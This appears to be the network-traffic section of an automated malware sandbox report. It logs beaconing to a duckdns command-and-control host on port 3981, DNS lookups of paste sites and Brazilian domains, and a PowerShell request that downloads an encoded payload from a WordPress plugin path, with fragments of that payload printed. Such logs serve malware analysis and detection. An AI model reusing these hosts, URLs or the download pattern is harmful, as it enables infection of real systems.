                                          Oct 14, 2024 11:10:43.463450909 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463458061 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463458061 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463464022 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463479042 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463488102 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463501930 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463501930 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463510036 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463522911 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463557005 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463557005 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463625908 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463639021 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463649035 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463659048 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463670015 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463679075 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463680983 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463695049 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463706017 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.463716984 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463716984 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.463793039 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464317083 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464339972 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464380026 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464390993 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464402914 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464425087 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464473963 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464483976 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464497089 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464504957 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464504957 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464509010 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464521885 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464533091 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464550018 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464570045 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464570045 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464598894 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464598894 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464608908 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464620113 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464631081 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464641094 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464656115 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464665890 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464678049 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464678049 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464684963 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464696884 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464706898 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464725971 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464731932 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464731932 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464739084 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464751959 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464762926 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464771986 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464782953 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.464793921 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464793921 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.464983940 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465524912 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465539932 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465553045 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465564013 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465574980 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465583086 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465583086 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465588093 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465601921 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465612888 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465626001 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465635061 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465635061 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465636015 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465648890 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465661049 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465679884 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465688944 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.465697050 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465697050 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.465812922 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.467679024 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467710018 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467767954 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.467770100 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467783928 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467796087 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467807055 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467817068 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.467834949 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.467834949 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.467916965 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.468630075 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.468642950 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.468662024 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.468671083 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.468704939 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.468704939 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.469187975 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.469929934 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.469945908 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.469958067 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.469981909 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.470017910 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470031023 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470043898 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470101118 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.470101118 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.470259905 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470292091 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470303059 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470334053 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.470339060 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.470351934 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.471052885 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.478311062 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.484908104 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.524614096 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524640083 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524652958 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524662971 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524673939 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524693012 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524704933 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524715900 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524728060 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524729967 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.524729967 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.524739981 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524754047 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524765968 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524772882 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.524772882 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.524779081 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.524815083 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.524816036 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.536062002 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536089897 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536103010 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536113977 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536125898 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536137104 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536149979 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.536176920 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.536176920 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.537250996 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537264109 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537276030 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537295103 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537307024 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537318945 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.537318945 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537318945 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.537333965 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.537383080 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.537383080 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.540565968 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540591955 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540604115 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540615082 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540627003 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540637970 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540651083 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.540662050 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.540663004 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.540751934 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:43.544240952 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:43.544281006 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:45.645365953 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:45.650270939 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650285006 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650307894 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650316954 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650336981 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:45.650342941 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650402069 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650435925 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:45.650473118 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650484085 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650494099 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.650504112 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655213118 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655236006 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655303955 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655313015 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655426025 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655484915 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.655803919 CEST398149788172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:45.656949043 CEST497883981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:47.977039099 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:47.977091074 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:47.977170944 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:47.979464054 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:47.979485035 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.456660986 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.456768990 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:48.459070921 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:48.459104061 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.459355116 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.474668980 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:48.519406080 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.604073048 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.604301929 CEST44349819104.20.3.235192.168.2.5
                                          Oct 14, 2024 11:10:48.604386091 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:48.605134964 CEST49819443192.168.2.5104.20.3.235
                                          Oct 14, 2024 11:10:54.143215895 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:10:54.144397974 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:10:54.149337053 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:11:24.160523891 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:11:24.162518978 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:11:24.167469025 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:11:54.172214031 CEST398149775172.111.213.72192.168.2.5
                                          Oct 14, 2024 11:11:54.173868895 CEST497753981192.168.2.5172.111.213.72
                                          Oct 14, 2024 11:11:54.178692102 CEST398149775172.111.213.72192.168.2.5
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 14, 2024 11:10:13.598906994 CEST6332953192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:14.076128006 CEST53633291.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:19.725596905 CEST6175353192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:19.734711885 CEST53617531.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:28.115377903 CEST5794953192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:28.332017899 CEST53579491.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:35.041153908 CEST6326653192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:35.048758030 CEST53632661.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:35.795851946 CEST5709053192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:37.110281944 CEST5709053192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:38.184561014 CEST5709053192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:39.806077003 CEST53570901.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:39.806096077 CEST53570901.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:39.806103945 CEST53570901.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:39.811400890 CEST5357853192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:39.928977966 CEST53535781.1.1.1192.168.2.5
                                          Oct 14, 2024 11:10:41.551338911 CEST6147353192.168.2.51.1.1.1
                                          Oct 14, 2024 11:10:41.558900118 CEST53614731.1.1.1192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 14, 2024 11:10:13.598906994 CEST192.168.2.51.1.1.10x6528Standard query (0)ftp.desckvbrat.com.brA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:19.725596905 CEST192.168.2.51.1.1.10x936dStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:28.115377903 CEST192.168.2.51.1.1.10x6030Standard query (0)sbelegi.com.brA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:35.041153908 CEST192.168.2.51.1.1.10x2e39Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:35.795851946 CEST192.168.2.51.1.1.10xea9eStandard query (0)janbours92harbu03.duckdns.orgA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:37.110281944 CEST192.168.2.51.1.1.10xea9eStandard query (0)janbours92harbu03.duckdns.orgA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:38.184561014 CEST192.168.2.51.1.1.10xea9eStandard query (0)janbours92harbu03.duckdns.orgA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:39.811400890 CEST192.168.2.51.1.1.10xb635Standard query (0)janbours92harbu04.duckdns.orgA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:41.551338911 CEST192.168.2.51.1.1.10x4f91Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 14, 2024 11:10:14.076128006 CEST1.1.1.1192.168.2.50x6528No error (0)ftp.desckvbrat.com.brdesckvbrat.com.brCNAME (Canonical name)IN (0x0001)false
                                          Oct 14, 2024 11:10:14.076128006 CEST1.1.1.1192.168.2.50x6528No error (0)desckvbrat.com.br191.252.83.213A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:19.734711885 CEST1.1.1.1192.168.2.50x936dNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:19.734711885 CEST1.1.1.1192.168.2.50x936dNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:28.332017899 CEST1.1.1.1192.168.2.50x6030No error (0)sbelegi.com.br128.201.75.197A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:35.048758030 CEST1.1.1.1192.168.2.50x2e39No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:35.048758030 CEST1.1.1.1192.168.2.50x2e39No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:35.048758030 CEST1.1.1.1192.168.2.50x2e39No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:39.806077003 CEST1.1.1.1192.168.2.50xea9eServer failure (2)janbours92harbu03.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:39.806096077 CEST1.1.1.1192.168.2.50xea9eServer failure (2)janbours92harbu03.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:39.806103945 CEST1.1.1.1192.168.2.50xea9eServer failure (2)janbours92harbu03.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:39.928977966 CEST1.1.1.1192.168.2.50xb635No error (0)janbours92harbu04.duckdns.org172.111.213.72A (IP address)IN (0x0001)false
                                          Oct 14, 2024 11:10:41.558900118 CEST1.1.1.1192.168.2.50x4f91No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                          • paste.ee
                                          • pastebin.com
                                          • sbelegi.com.br
                                          • geoplugin.net
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549711128.201.75.197801436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 14, 2024 11:10:28.339871883 CEST100OUTGET /wp-content/plugins/cognac/smsinc.txt HTTP/1.1
                                          Host: sbelegi.com.br
                                          Connection: Keep-Alive
                                          Oct 14, 2024 11:10:29.146780968 CEST292INHTTP/1.1 200 OK
                                          Connection: Keep-Alive
                                          Keep-Alive: timeout=5, max=100
                                          content-type: text/plain
                                          last-modified: Mon, 14 Oct 2024 03:33:57 GMT
                                          etag: "a1000-670c9125-c55a6e5d6ec41235;;;"
                                          accept-ranges: bytes
                                          content-length: 659456
                                          date: Mon, 14 Oct 2024 09:10:04 GMT
                                          vary: User-Agent
                                          Oct 14, 2024 11:10:29.147073030 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67
                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgY
                                          Oct 14, 2024 11:10:29.147084951 CEST1236INData Raw: 6f 50 44 35 7a 41 39 4d 49 50 44 78 41 41 51 41 63 42 67 42 51 44 51 4f 6f 6b 44 4a 41 41 41 41 4d 41 67 42 41 44 41 41 41 30 44 38 41 41 41 41 4d 41 67 42 77 43 41 4f 77 6a 44 36 34 51 4a 4f 51 69 44 6a 34 67 46 4f 34 67 44 46 33 77 2f 4e 34 66
                                          Data Ascii: oPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZNQWDj1gYNEWDg1wXN4VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR1AUN8UDO1QTNwUDL1gSNkUDI1wRNYUDF1ARNMUD
                                          Oct 14, 2024 11:10:29.147095919 CEST1236INData Raw: 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d 66 44 78 33 77
                                          Data Ascii: 4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wd
                                          Oct 14, 2024 11:10:29.147109032 CEST1236INData Raw: 30 6e 44 38 35 77 65 4f 6f 6e 44 35 35 41 65 4f 63 6e 44 32 35 51 64 4f 51 6e 44 7a 35 67 63 4f 45 6e 44 77 35 77 62 4f 34 6d 44 74 35 41 62 4f 73 6d 44 71 35 51 61 4f 67 6d 44 6e 35 67 5a 4f 55 6d 44 6b 35 77 59 4f 49 6d 44 68 35 41 59 4f 38 6c
                                          Data Ascii: 0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RD
                                          Oct 14, 2024 11:10:29.147177935 CEST1236INData Raw: 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77
